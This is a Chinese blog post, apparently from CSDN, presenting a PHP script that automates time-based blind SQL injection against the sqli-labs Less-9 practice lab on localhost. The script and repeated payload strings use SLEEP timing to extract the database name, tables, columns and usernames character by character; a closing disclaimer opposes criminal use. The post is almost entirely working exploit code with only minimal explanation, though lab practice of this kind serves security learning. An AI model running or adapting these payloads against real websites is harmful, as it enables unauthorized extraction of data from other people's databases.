数据库盲注php代码

最新推荐文章于 2022-08-02 09:48:24 发布

蜜罐小明哥

最新推荐文章于 2022-08-02 09:48:24 发布

阅读量205

点赞数 1

文章标签： mysql

本文链接：https://blog.csdn.net/qq_25645753/article/details/108065028

版权

数据库自动盲注代码

<?php
function juhecurl($url,$params=false,$ispost=0){
    $httpInfo = array();
    $ch = curl_init();

    curl_setopt( $ch, CURLOPT_HTTP_VERSION , CURL_HTTP_VERSION_1_1 );
    curl_setopt( $ch, CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36' );
    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT , 30 );
    curl_setopt( $ch, CURLOPT_TIMEOUT , 30);
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER , true );
    if( $ispost )
    {
        curl_setopt( $ch , CURLOPT_POST , true );
        curl_setopt( $ch , CURLOPT_POSTFIELDS , $params );
        curl_setopt( $ch , CURLOPT_URL , $url );
    }
    else
    {
        if($params){
            curl_setopt( $ch , CURLOPT_URL , $url.'?'.$params );
        }else{
            curl_setopt( $ch , CURLOPT_URL , $url);
        }
    }
    $response = curl_exec( $ch );
    if ($response === FALSE) {
        //echo "cURL Error: " . curl_error($ch);
        return false;
    }
    $httpCode = curl_getinfo( $ch , CURLINFO_HTTP_CODE );
    $httpInfo = array_merge( $httpInfo , curl_getinfo( $ch ) );
    curl_close( $ch );
    return $response;
}
//爆数据库
//$_Payload = "1' and if((ASCII((SUBSTR(DATABASE(),%d,1))) = %d),SLEEP(2),'2')-- -";
//爆表
//$_Payload = "1' and if((ASCII((substr((select group_concat(table_name) from information_schema.`TABLES` where TABLE_schema=0x7365637572697479),%d,1))) = %d),sleep(2),'2')-- -";
//爆字段
//$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(column_name) from information_schema.`COLUMNS` where TABLE_schema=0x7365637572697479 and table_name=0x7573657273
),%d,1))) = %d),sleep(2),'2')-- -";
//爆数据
$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(username) from `security`.users ),%d,1))) = %d),sleep(2),'2')-- -";
$url = 'http://127.0.0.1/SQLInj/sqli-labs/Less-9/';
for($i=1;$i<=40;$i++){
    for($a=32;$a<=127;$a++){
      $payload = sprintf($_Payload,$i,$a);
      $b = "id=".urlencode($payload);
      $begin_time=time();
      $res = juhecurl($url,$b,0);
      $end_time=time() - $begin_time;
       if ($end_time>1){
          echo chr($a);
          break;
       }
    }
}
?>

爆数据库


//$_Payload = "1' and if((ASCII((SUBSTR(DATABASE(),%d,1))) = %d),SLEEP(2),'2')-- -";

在这里插入图片描述

爆表

//$_Payload = "1' and if((ASCII((substr((select group_concat(table_name) from information_schema.`TABLES` where TABLE_schema=0x7365637572697479),%d,1))) = %d),sleep(2),'2')-- -";

在这里插入图片描述

爆字段

//$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(column_name) from information_schema.`COLUMNS` where TABLE_schema=0x7365637572697479 and table_name=0x7573657273
),%d,1))) = %d),sleep(2),'2')-- -";

在这里插入图片描述

爆数据

$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(username) from `security`.users ),%d,1))) = %d),sleep(2),'2')-- -";

在这里插入图片描述
声明：本人坚决反对利用教学方法进行犯罪的行为，一切犯罪行为必将受到严惩，绿色网络需要我们共同维护，更推荐大家了解它们背后的原理，更好地进行防护

蜜罐小明哥

关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫